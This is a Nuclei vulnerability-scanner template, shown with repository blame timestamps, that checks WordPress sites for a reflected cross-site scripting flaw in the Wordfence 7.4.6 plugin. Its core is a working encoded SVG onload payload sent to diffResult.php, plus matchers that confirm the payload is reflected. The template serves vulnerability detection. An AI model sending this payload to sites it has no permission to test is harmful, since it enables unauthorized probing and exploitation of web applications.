nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml

28 lines
600 B
YAML
Raw Normal View History

id: wordpress-wordfence-xss
info:
name: WordPress Wordfence 7.4.6 Cross Site Scripting
author: madrobot
2020-05-24 22:19:21 +00:00
severity: medium
2021-02-16 17:02:57 +00:00
tags: wordpress,wp-plugin,xss
requests:
- method: GET
path:
2021-05-10 18:59:01 +00:00
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
matchers-condition: and
matchers:
- type: word
words:
2021-05-10 18:59:01 +00:00
- "'>\"<svg/onload=confirm('test')>"
part: body
2021-06-21 12:39:16 +00:00
- type: word
words:
- "text/html"
2021-05-10 18:59:01 +00:00
part: header
- type: status
status:
- 200